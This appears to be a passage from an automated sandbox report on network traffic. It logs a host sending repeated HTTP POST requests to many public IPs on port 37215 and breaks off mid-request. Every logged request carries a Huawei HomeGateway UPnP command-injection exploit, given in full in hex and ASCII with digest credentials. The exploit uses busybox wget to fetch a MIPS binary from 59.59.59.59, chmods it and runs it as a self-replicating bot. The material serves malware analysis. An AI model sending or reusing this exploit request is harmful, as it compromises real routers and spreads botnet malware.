2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1070192.168.2.1540778157.187.187.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.733222008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1071192.168.2.1539856139.70.168.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.738610029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1072192.168.2.1558736142.24.12.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.738668919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1073192.168.2.1550852181.27.244.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.738693953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1074192.168.2.154330041.86.166.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.738884926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1075192.168.2.1537472104.241.56.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739000082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1076192.168.2.1536536157.146.9.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739038944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1077192.168.2.155929038.184.177.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739053011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1078192.168.2.153304241.37.129.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739075899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1079192.168.2.1554520157.165.238.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739100933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1080192.168.2.1549524157.64.212.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739130020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
